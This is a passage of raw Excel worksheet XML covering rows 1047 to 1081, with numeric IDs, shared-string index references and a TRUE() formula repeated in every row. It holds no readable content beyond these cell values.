      <c r="A1047" s="1">
        <v>17415</v>
      </c>
      <c r="B1047" t="s">
        <v>0</v>
      </c>
      <c r="C1047" t="s">
        <v>78</v>
      </c>
      <c r="D1047" t="s">
        <v>1296</v>
      </c>
      <c r="E1047" t="s">
        <v>1227</v>
      </c>
      <c r="F1047">
        <v>29117303</v>
      </c>
      <c r="G1047" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1047" t="s">
        <v>1381</v>
      </c>
      <c r="K1047">
        <v>0</v>
      </c>
      <c r="L1047" t="s">
        <v>98</v>
      </c>
      <c r="R1047" t="s">
        <v>5</v>
      </c>
      <c r="S1047" t="s">
        <v>1229</v>
      </c>
      <c r="T1047" t="s">
        <v>7</v>
      </c>
      <c r="U1047" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1048" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1048" s="1">
        <v>17416</v>
      </c>
      <c r="B1048" t="s">
        <v>0</v>
      </c>
      <c r="C1048" t="s">
        <v>78</v>
      </c>
      <c r="D1048" t="s">
        <v>1296</v>
      </c>
      <c r="E1048" t="s">
        <v>1227</v>
      </c>
      <c r="F1048">
        <v>29117303</v>
      </c>
      <c r="G1048" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1048" t="s">
        <v>1382</v>
      </c>
      <c r="K1048">
        <v>0</v>
      </c>
      <c r="L1048" t="s">
        <v>98</v>
      </c>
      <c r="R1048" t="s">
        <v>5</v>
      </c>
      <c r="S1048" t="s">
        <v>1229</v>
      </c>
      <c r="T1048" t="s">
        <v>7</v>
      </c>
      <c r="U1048" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1049" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1049" s="1">
        <v>17417</v>
      </c>
      <c r="B1049" t="s">
        <v>0</v>
      </c>
      <c r="C1049" t="s">
        <v>78</v>
      </c>
      <c r="D1049" t="s">
        <v>1296</v>
      </c>
      <c r="E1049" t="s">
        <v>1227</v>
      </c>
      <c r="F1049">
        <v>29117303</v>
      </c>
      <c r="G1049" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1049" t="s">
        <v>1383</v>
      </c>
      <c r="K1049">
        <v>0</v>
      </c>
      <c r="L1049" t="s">
        <v>98</v>
      </c>
      <c r="R1049" t="s">
        <v>5</v>
      </c>
      <c r="S1049" t="s">
        <v>1229</v>
      </c>
      <c r="T1049" t="s">
        <v>7</v>
      </c>
      <c r="U1049" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1050" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1050" s="1">
        <v>17418</v>
      </c>
      <c r="B1050" t="s">
        <v>0</v>
      </c>
      <c r="C1050" t="s">
        <v>78</v>
      </c>
      <c r="D1050" t="s">
        <v>1296</v>
      </c>
      <c r="E1050" t="s">
        <v>1227</v>
      </c>
      <c r="F1050">
        <v>29117303</v>
      </c>
      <c r="G1050" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1050" t="s">
        <v>1384</v>
      </c>
      <c r="K1050">
        <v>0</v>
      </c>
      <c r="L1050" t="s">
        <v>98</v>
      </c>
      <c r="R1050" t="s">
        <v>5</v>
      </c>
      <c r="S1050" t="s">
        <v>1229</v>
      </c>
      <c r="T1050" t="s">
        <v>7</v>
      </c>
      <c r="U1050" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1051" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1051" s="1">
        <v>17419</v>
      </c>
      <c r="B1051" t="s">
        <v>0</v>
      </c>
      <c r="C1051" t="s">
        <v>78</v>
      </c>
      <c r="D1051" t="s">
        <v>1296</v>
      </c>
      <c r="E1051" t="s">
        <v>1227</v>
      </c>
      <c r="F1051">
        <v>29117303</v>
      </c>
      <c r="G1051" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1051" t="s">
        <v>1385</v>
      </c>
      <c r="K1051">
        <v>0</v>
      </c>
      <c r="L1051" t="s">
        <v>98</v>
      </c>
      <c r="R1051" t="s">
        <v>5</v>
      </c>
      <c r="S1051" t="s">
        <v>1229</v>
      </c>
      <c r="T1051" t="s">
        <v>7</v>
      </c>
      <c r="U1051" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1052" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1052" s="1">
        <v>17420</v>
      </c>
      <c r="B1052" t="s">
        <v>0</v>
      </c>
      <c r="C1052" t="s">
        <v>78</v>
      </c>
      <c r="D1052" t="s">
        <v>1296</v>
      </c>
      <c r="E1052" t="s">
        <v>1227</v>
      </c>
      <c r="F1052">
        <v>29117303</v>
      </c>
      <c r="G1052" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1052" t="s">
        <v>1386</v>
      </c>
      <c r="K1052">
        <v>0</v>
      </c>
      <c r="L1052" t="s">
        <v>98</v>
      </c>
      <c r="R1052" t="s">
        <v>5</v>
      </c>
      <c r="S1052" t="s">
        <v>1229</v>
      </c>
      <c r="T1052" t="s">
        <v>7</v>
      </c>
      <c r="U1052" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1053" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1053" s="1">
        <v>17421</v>
      </c>
      <c r="B1053" t="s">
        <v>0</v>
      </c>
      <c r="C1053" t="s">
        <v>78</v>
      </c>
      <c r="D1053" t="s">
        <v>1296</v>
      </c>
      <c r="E1053" t="s">
        <v>1227</v>
      </c>
      <c r="F1053">
        <v>29117303</v>
      </c>
      <c r="G1053" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1053" t="s">
        <v>1387</v>
      </c>
      <c r="K1053">
        <v>0</v>
      </c>
      <c r="L1053" t="s">
        <v>98</v>
      </c>
      <c r="R1053" t="s">
        <v>5</v>
      </c>
      <c r="S1053" t="s">
        <v>1229</v>
      </c>
      <c r="T1053" t="s">
        <v>7</v>
      </c>
      <c r="U1053" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1054" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1054" s="1">
        <v>17422</v>
      </c>
      <c r="B1054" t="s">
        <v>0</v>
      </c>
      <c r="C1054" t="s">
        <v>78</v>
      </c>
      <c r="D1054" t="s">
        <v>1296</v>
      </c>
      <c r="E1054" t="s">
        <v>1227</v>
      </c>
      <c r="F1054">
        <v>29117303</v>
      </c>
      <c r="G1054" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1054" t="s">
        <v>1388</v>
      </c>
      <c r="K1054">
        <v>0</v>
      </c>
      <c r="L1054" t="s">
        <v>98</v>
      </c>
      <c r="R1054" t="s">
        <v>5</v>
      </c>
      <c r="S1054" t="s">
        <v>1229</v>
      </c>
      <c r="T1054" t="s">
        <v>7</v>
      </c>
      <c r="U1054" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1055" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1055" s="1">
        <v>17423</v>
      </c>
      <c r="B1055" t="s">
        <v>0</v>
      </c>
      <c r="C1055" t="s">
        <v>78</v>
      </c>
      <c r="D1055" t="s">
        <v>1296</v>
      </c>
      <c r="E1055" t="s">
        <v>1227</v>
      </c>
      <c r="F1055">
        <v>29117303</v>
      </c>
      <c r="G1055" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1055" t="s">
        <v>1389</v>
      </c>
      <c r="K1055">
        <v>0</v>
      </c>
      <c r="L1055" t="s">
        <v>98</v>
      </c>
      <c r="R1055" t="s">
        <v>5</v>
      </c>
      <c r="S1055" t="s">
        <v>1229</v>
      </c>
      <c r="T1055" t="s">
        <v>7</v>
      </c>
      <c r="U1055" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1056" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1056" s="1">
        <v>17424</v>
      </c>
      <c r="B1056" t="s">
        <v>0</v>
      </c>
      <c r="C1056" t="s">
        <v>1</v>
      </c>
      <c r="D1056" t="s">
        <v>1296</v>
      </c>
      <c r="E1056" t="s">
        <v>1227</v>
      </c>
      <c r="F1056">
        <v>29117303</v>
      </c>
      <c r="G1056" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1056" t="s">
        <v>1390</v>
      </c>
      <c r="K1056">
        <v>0</v>
      </c>
      <c r="L1056" t="s">
        <v>98</v>
      </c>
      <c r="R1056" t="s">
        <v>5</v>
      </c>
      <c r="S1056" t="s">
        <v>1229</v>
      </c>
      <c r="T1056" t="s">
        <v>7</v>
      </c>
      <c r="U1056" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1057" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1057" s="1">
        <v>17425</v>
      </c>
      <c r="B1057" t="s">
        <v>0</v>
      </c>
      <c r="C1057" t="s">
        <v>1</v>
      </c>
      <c r="D1057" t="s">
        <v>1296</v>
      </c>
      <c r="E1057" t="s">
        <v>1227</v>
      </c>
      <c r="F1057">
        <v>29117303</v>
      </c>
      <c r="G1057" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1057" t="s">
        <v>1391</v>
      </c>
      <c r="K1057">
        <v>0</v>
      </c>
      <c r="L1057" t="s">
        <v>98</v>
      </c>
      <c r="R1057" t="s">
        <v>5</v>
      </c>
      <c r="S1057" t="s">
        <v>1229</v>
      </c>
      <c r="T1057" t="s">
        <v>7</v>
      </c>
      <c r="U1057" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1058" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1058" s="1">
        <v>17426</v>
      </c>
      <c r="B1058" t="s">
        <v>0</v>
      </c>
      <c r="C1058" t="s">
        <v>78</v>
      </c>
      <c r="D1058" t="s">
        <v>1296</v>
      </c>
      <c r="E1058" t="s">
        <v>1227</v>
      </c>
      <c r="F1058">
        <v>29117303</v>
      </c>
      <c r="G1058" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1058" t="s">
        <v>1392</v>
      </c>
      <c r="K1058">
        <v>0</v>
      </c>
      <c r="L1058" t="s">
        <v>98</v>
      </c>
      <c r="R1058" t="s">
        <v>5</v>
      </c>
      <c r="S1058" t="s">
        <v>1229</v>
      </c>
      <c r="T1058" t="s">
        <v>7</v>
      </c>
      <c r="U1058" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1059" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1059" s="1">
        <v>17427</v>
      </c>
      <c r="B1059" t="s">
        <v>0</v>
      </c>
      <c r="C1059" t="s">
        <v>78</v>
      </c>
      <c r="D1059" t="s">
        <v>1296</v>
      </c>
      <c r="E1059" t="s">
        <v>1227</v>
      </c>
      <c r="F1059">
        <v>29117303</v>
      </c>
      <c r="G1059" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1059" t="s">
        <v>1393</v>
      </c>
      <c r="K1059">
        <v>0</v>
      </c>
      <c r="L1059" t="s">
        <v>98</v>
      </c>
      <c r="R1059" t="s">
        <v>5</v>
      </c>
      <c r="S1059" t="s">
        <v>1229</v>
      </c>
      <c r="T1059" t="s">
        <v>7</v>
      </c>
      <c r="U1059" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1060" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1060" s="1">
        <v>17428</v>
      </c>
      <c r="B1060" t="s">
        <v>0</v>
      </c>
      <c r="C1060" t="s">
        <v>78</v>
      </c>
      <c r="D1060" t="s">
        <v>1296</v>
      </c>
      <c r="E1060" t="s">
        <v>1227</v>
      </c>
      <c r="F1060">
        <v>29117303</v>
      </c>
      <c r="G1060" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1060" t="s">
        <v>1394</v>
      </c>
      <c r="K1060">
        <v>0</v>
      </c>
      <c r="L1060" t="s">
        <v>98</v>
      </c>
      <c r="R1060" t="s">
        <v>5</v>
      </c>
      <c r="S1060" t="s">
        <v>1229</v>
      </c>
      <c r="T1060" t="s">
        <v>7</v>
      </c>
      <c r="U1060" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1061" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1061" s="1">
        <v>17429</v>
      </c>
      <c r="B1061" t="s">
        <v>0</v>
      </c>
      <c r="C1061" t="s">
        <v>78</v>
      </c>
      <c r="D1061" t="s">
        <v>1296</v>
      </c>
      <c r="E1061" t="s">
        <v>1227</v>
      </c>
      <c r="F1061">
        <v>29117303</v>
      </c>
      <c r="G1061" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1061" t="s">
        <v>1395</v>
      </c>
      <c r="K1061">
        <v>0</v>
      </c>
      <c r="L1061" t="s">
        <v>98</v>
      </c>
      <c r="R1061" t="s">
        <v>5</v>
      </c>
      <c r="S1061" t="s">
        <v>1229</v>
      </c>
      <c r="T1061" t="s">
        <v>7</v>
      </c>
      <c r="U1061" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1062" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1062" s="1">
        <v>17430</v>
      </c>
      <c r="B1062" t="s">
        <v>0</v>
      </c>
      <c r="C1062" t="s">
        <v>78</v>
      </c>
      <c r="D1062" t="s">
        <v>1296</v>
      </c>
      <c r="E1062" t="s">
        <v>1227</v>
      </c>
      <c r="F1062">
        <v>29117303</v>
      </c>
      <c r="G1062" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1062" t="s">
        <v>1396</v>
      </c>
      <c r="K1062">
        <v>0</v>
      </c>
      <c r="L1062" t="s">
        <v>98</v>
      </c>
      <c r="R1062" t="s">
        <v>5</v>
      </c>
      <c r="S1062" t="s">
        <v>1229</v>
      </c>
      <c r="T1062" t="s">
        <v>7</v>
      </c>
      <c r="U1062" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1063" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1063" s="1">
        <v>17431</v>
      </c>
      <c r="B1063" t="s">
        <v>0</v>
      </c>
      <c r="C1063" t="s">
        <v>78</v>
      </c>
      <c r="D1063" t="s">
        <v>1296</v>
      </c>
      <c r="E1063" t="s">
        <v>1227</v>
      </c>
      <c r="F1063">
        <v>29117303</v>
      </c>
      <c r="G1063" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1063" t="s">
        <v>1397</v>
      </c>
      <c r="K1063">
        <v>0</v>
      </c>
      <c r="L1063" t="s">
        <v>98</v>
      </c>
      <c r="R1063" t="s">
        <v>5</v>
      </c>
      <c r="S1063" t="s">
        <v>1229</v>
      </c>
      <c r="T1063" t="s">
        <v>7</v>
      </c>
      <c r="U1063" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1064" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1064" s="1">
        <v>17432</v>
      </c>
      <c r="B1064" t="s">
        <v>0</v>
      </c>
      <c r="C1064" t="s">
        <v>78</v>
      </c>
      <c r="D1064" t="s">
        <v>1296</v>
      </c>
      <c r="E1064" t="s">
        <v>1227</v>
      </c>
      <c r="F1064">
        <v>29117303</v>
      </c>
      <c r="G1064" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1064" t="s">
        <v>1398</v>
      </c>
      <c r="K1064">
        <v>0</v>
      </c>
      <c r="L1064" t="s">
        <v>98</v>
      </c>
      <c r="R1064" t="s">
        <v>5</v>
      </c>
      <c r="S1064" t="s">
        <v>1229</v>
      </c>
      <c r="T1064" t="s">
        <v>7</v>
      </c>
      <c r="U1064" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1065" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1065" s="1">
        <v>17433</v>
      </c>
      <c r="B1065" t="s">
        <v>0</v>
      </c>
      <c r="C1065" t="s">
        <v>78</v>
      </c>
      <c r="D1065" t="s">
        <v>1296</v>
      </c>
      <c r="E1065" t="s">
        <v>1227</v>
      </c>
      <c r="F1065">
        <v>29117303</v>
      </c>
      <c r="G1065" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1065" t="s">
        <v>1399</v>
      </c>
      <c r="K1065">
        <v>0</v>
      </c>
      <c r="L1065" t="s">
        <v>98</v>
      </c>
      <c r="R1065" t="s">
        <v>5</v>
      </c>
      <c r="S1065" t="s">
        <v>1229</v>
      </c>
      <c r="T1065" t="s">
        <v>7</v>
      </c>
      <c r="U1065" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1066" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1066" s="1">
        <v>17434</v>
      </c>
      <c r="B1066" t="s">
        <v>0</v>
      </c>
      <c r="C1066" t="s">
        <v>78</v>
      </c>
      <c r="D1066" t="s">
        <v>1296</v>
      </c>
      <c r="E1066" t="s">
        <v>1227</v>
      </c>
      <c r="F1066">
        <v>29117303</v>
      </c>
      <c r="G1066" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1066" t="s">
        <v>1400</v>
      </c>
      <c r="K1066">
        <v>0</v>
      </c>
      <c r="L1066" t="s">
        <v>98</v>
      </c>
      <c r="R1066" t="s">
        <v>5</v>
      </c>
      <c r="S1066" t="s">
        <v>1229</v>
      </c>
      <c r="T1066" t="s">
        <v>7</v>
      </c>
      <c r="U1066" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1067" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1067" s="1">
        <v>17435</v>
      </c>
      <c r="B1067" t="s">
        <v>0</v>
      </c>
      <c r="C1067" t="s">
        <v>78</v>
      </c>
      <c r="D1067" t="s">
        <v>1296</v>
      </c>
      <c r="E1067" t="s">
        <v>1227</v>
      </c>
      <c r="F1067">
        <v>29117303</v>
      </c>
      <c r="G1067" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1067" t="s">
        <v>1401</v>
      </c>
      <c r="K1067">
        <v>0</v>
      </c>
      <c r="L1067" t="s">
        <v>98</v>
      </c>
      <c r="R1067" t="s">
        <v>5</v>
      </c>
      <c r="S1067" t="s">
        <v>1229</v>
      </c>
      <c r="T1067" t="s">
        <v>7</v>
      </c>
      <c r="U1067" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1068" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1068" s="1">
        <v>17436</v>
      </c>
      <c r="B1068" t="s">
        <v>0</v>
      </c>
      <c r="C1068" t="s">
        <v>78</v>
      </c>
      <c r="D1068" t="s">
        <v>1296</v>
      </c>
      <c r="E1068" t="s">
        <v>1227</v>
      </c>
      <c r="F1068">
        <v>29117303</v>
      </c>
      <c r="G1068" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1068" t="s">
        <v>1402</v>
      </c>
      <c r="K1068">
        <v>0</v>
      </c>
      <c r="L1068" t="s">
        <v>98</v>
      </c>
      <c r="R1068" t="s">
        <v>5</v>
      </c>
      <c r="S1068" t="s">
        <v>1229</v>
      </c>
      <c r="T1068" t="s">
        <v>7</v>
      </c>
      <c r="U1068" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1069" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1069" s="1">
        <v>17437</v>
      </c>
      <c r="B1069" t="s">
        <v>0</v>
      </c>
      <c r="C1069" t="s">
        <v>78</v>
      </c>
      <c r="D1069" t="s">
        <v>1296</v>
      </c>
      <c r="E1069" t="s">
        <v>1227</v>
      </c>
      <c r="F1069">
        <v>29117303</v>
      </c>
      <c r="G1069" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1069" t="s">
        <v>1403</v>
      </c>
      <c r="K1069">
        <v>0</v>
      </c>
      <c r="L1069" t="s">
        <v>98</v>
      </c>
      <c r="R1069" t="s">
        <v>5</v>
      </c>
      <c r="S1069" t="s">
        <v>1229</v>
      </c>
      <c r="T1069" t="s">
        <v>7</v>
      </c>
      <c r="U1069" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1070" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1070" s="1">
        <v>17438</v>
      </c>
      <c r="B1070" t="s">
        <v>0</v>
      </c>
      <c r="C1070" t="s">
        <v>78</v>
      </c>
      <c r="D1070" t="s">
        <v>1296</v>
      </c>
      <c r="E1070" t="s">
        <v>1227</v>
      </c>
      <c r="F1070">
        <v>29117303</v>
      </c>
      <c r="G1070" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1070" t="s">
        <v>1404</v>
      </c>
      <c r="K1070">
        <v>0</v>
      </c>
      <c r="L1070" t="s">
        <v>98</v>
      </c>
      <c r="R1070" t="s">
        <v>5</v>
      </c>
      <c r="S1070" t="s">
        <v>1229</v>
      </c>
      <c r="T1070" t="s">
        <v>7</v>
      </c>
      <c r="U1070" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1071" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1071" s="1">
        <v>17439</v>
      </c>
      <c r="B1071" t="s">
        <v>0</v>
      </c>
      <c r="C1071" t="s">
        <v>78</v>
      </c>
      <c r="D1071" t="s">
        <v>1296</v>
      </c>
      <c r="E1071" t="s">
        <v>1227</v>
      </c>
      <c r="F1071">
        <v>29117303</v>
      </c>
      <c r="G1071" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1071" t="s">
        <v>1405</v>
      </c>
      <c r="K1071">
        <v>0</v>
      </c>
      <c r="L1071" t="s">
        <v>98</v>
      </c>
      <c r="R1071" t="s">
        <v>5</v>
      </c>
      <c r="S1071" t="s">
        <v>1229</v>
      </c>
      <c r="T1071" t="s">
        <v>7</v>
      </c>
      <c r="U1071" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1072" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1072" s="1">
        <v>17440</v>
      </c>
      <c r="B1072" t="s">
        <v>0</v>
      </c>
      <c r="C1072" t="s">
        <v>78</v>
      </c>
      <c r="D1072" t="s">
        <v>1296</v>
      </c>
      <c r="E1072" t="s">
        <v>1227</v>
      </c>
      <c r="F1072">
        <v>29117303</v>
      </c>
      <c r="G1072" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1072" t="s">
        <v>1406</v>
      </c>
      <c r="K1072">
        <v>0</v>
      </c>
      <c r="L1072" t="s">
        <v>98</v>
      </c>
      <c r="R1072" t="s">
        <v>5</v>
      </c>
      <c r="S1072" t="s">
        <v>1229</v>
      </c>
      <c r="T1072" t="s">
        <v>7</v>
      </c>
      <c r="U1072" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1073" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1073" s="1">
        <v>17441</v>
      </c>
      <c r="B1073" t="s">
        <v>0</v>
      </c>
      <c r="C1073" t="s">
        <v>78</v>
      </c>
      <c r="D1073" t="s">
        <v>1296</v>
      </c>
      <c r="E1073" t="s">
        <v>1227</v>
      </c>
      <c r="F1073">
        <v>29117303</v>
      </c>
      <c r="G1073" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1073" t="s">
        <v>1407</v>
      </c>
      <c r="K1073">
        <v>0</v>
      </c>
      <c r="L1073" t="s">
        <v>98</v>
      </c>
      <c r="R1073" t="s">
        <v>5</v>
      </c>
      <c r="S1073" t="s">
        <v>1229</v>
      </c>
      <c r="T1073" t="s">
        <v>7</v>
      </c>
      <c r="U1073" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1074" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1074" s="1">
        <v>17442</v>
      </c>
      <c r="B1074" t="s">
        <v>0</v>
      </c>
      <c r="C1074" t="s">
        <v>78</v>
      </c>
      <c r="D1074" t="s">
        <v>1296</v>
      </c>
      <c r="E1074" t="s">
        <v>1227</v>
      </c>
      <c r="F1074">
        <v>29117303</v>
      </c>
      <c r="G1074" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1074" t="s">
        <v>1408</v>
      </c>
      <c r="K1074">
        <v>0</v>
      </c>
      <c r="L1074" t="s">
        <v>98</v>
      </c>
      <c r="R1074" t="s">
        <v>5</v>
      </c>
      <c r="S1074" t="s">
        <v>1229</v>
      </c>
      <c r="T1074" t="s">
        <v>7</v>
      </c>
      <c r="U1074" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1075" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1075" s="1">
        <v>17443</v>
      </c>
      <c r="B1075" t="s">
        <v>0</v>
      </c>
      <c r="C1075" t="s">
        <v>78</v>
      </c>
      <c r="D1075" t="s">
        <v>1296</v>
      </c>
      <c r="E1075" t="s">
        <v>1227</v>
      </c>
      <c r="F1075">
        <v>29117303</v>
      </c>
      <c r="G1075" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1075" t="s">
        <v>1409</v>
      </c>
      <c r="K1075">
        <v>0</v>
      </c>
      <c r="L1075" t="s">
        <v>98</v>
      </c>
      <c r="R1075" t="s">
        <v>5</v>
      </c>
      <c r="S1075" t="s">
        <v>1229</v>
      </c>
      <c r="T1075" t="s">
        <v>7</v>
      </c>
      <c r="U1075" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1076" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1076" s="1">
        <v>17444</v>
      </c>
      <c r="B1076" t="s">
        <v>0</v>
      </c>
      <c r="C1076" t="s">
        <v>78</v>
      </c>
      <c r="D1076" t="s">
        <v>1296</v>
      </c>
      <c r="E1076" t="s">
        <v>1227</v>
      </c>
      <c r="F1076">
        <v>29117303</v>
      </c>
      <c r="G1076" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1076" t="s">
        <v>1410</v>
      </c>
      <c r="K1076">
        <v>0</v>
      </c>
      <c r="L1076" t="s">
        <v>98</v>
      </c>
      <c r="R1076" t="s">
        <v>5</v>
      </c>
      <c r="S1076" t="s">
        <v>1229</v>
      </c>
      <c r="T1076" t="s">
        <v>7</v>
      </c>
      <c r="U1076" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1077" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1077" s="1">
        <v>17445</v>
      </c>
      <c r="B1077" t="s">
        <v>0</v>
      </c>
      <c r="C1077" t="s">
        <v>78</v>
      </c>
      <c r="D1077" t="s">
        <v>1296</v>
      </c>
      <c r="E1077" t="s">
        <v>1227</v>
      </c>
      <c r="F1077">
        <v>29117303</v>
      </c>
      <c r="G1077" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1077" t="s">
        <v>1411</v>
      </c>
      <c r="K1077">
        <v>0</v>
      </c>
      <c r="L1077" t="s">
        <v>98</v>
      </c>
      <c r="R1077" t="s">
        <v>5</v>
      </c>
      <c r="S1077" t="s">
        <v>1229</v>
      </c>
      <c r="T1077" t="s">
        <v>7</v>
      </c>
      <c r="U1077" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1078" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1078" s="1">
        <v>17446</v>
      </c>
      <c r="B1078" t="s">
        <v>0</v>
      </c>
      <c r="C1078" t="s">
        <v>78</v>
      </c>
      <c r="D1078" t="s">
        <v>1296</v>
      </c>
      <c r="E1078" t="s">
        <v>1227</v>
      </c>
      <c r="F1078">
        <v>29117303</v>
      </c>
      <c r="G1078" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1078" t="s">
        <v>1412</v>
      </c>
      <c r="K1078">
        <v>0</v>
      </c>
      <c r="L1078" t="s">
        <v>98</v>
      </c>
      <c r="R1078" t="s">
        <v>5</v>
      </c>
      <c r="S1078" t="s">
        <v>1229</v>
      </c>
      <c r="T1078" t="s">
        <v>7</v>
      </c>
      <c r="U1078" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1079" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1079" s="1">
        <v>17447</v>
      </c>
      <c r="B1079" t="s">
        <v>0</v>
      </c>
      <c r="C1079" t="s">
        <v>78</v>
      </c>
      <c r="D1079" t="s">
        <v>1296</v>
      </c>
      <c r="E1079" t="s">
        <v>1227</v>
      </c>
      <c r="F1079">
        <v>29117303</v>
      </c>
      <c r="G1079" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1079" t="s">
        <v>1413</v>
      </c>
      <c r="K1079">
        <v>0</v>
      </c>
      <c r="L1079" t="s">
        <v>98</v>
      </c>
      <c r="R1079" t="s">
        <v>5</v>
      </c>
      <c r="S1079" t="s">
        <v>1229</v>
      </c>
      <c r="T1079" t="s">
        <v>7</v>
      </c>
      <c r="U1079" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1080" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1080" s="1">
        <v>17448</v>
      </c>
      <c r="B1080" t="s">
        <v>0</v>
      </c>
      <c r="C1080" t="s">
        <v>78</v>
      </c>
      <c r="D1080" t="s">
        <v>1296</v>
      </c>
      <c r="E1080" t="s">
        <v>1227</v>
      </c>
      <c r="F1080">
        <v>29117303</v>
      </c>
      <c r="G1080" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1080" t="s">
        <v>1414</v>
      </c>
      <c r="K1080">
        <v>0</v>
      </c>
      <c r="L1080" t="s">
        <v>98</v>
      </c>
      <c r="R1080" t="s">
        <v>5</v>
      </c>
      <c r="S1080" t="s">
        <v>1229</v>
      </c>
      <c r="T1080" t="s">
        <v>7</v>
      </c>
      <c r="U1080" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1081" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1081" s="1">
        <v>17449</v>
      </c>
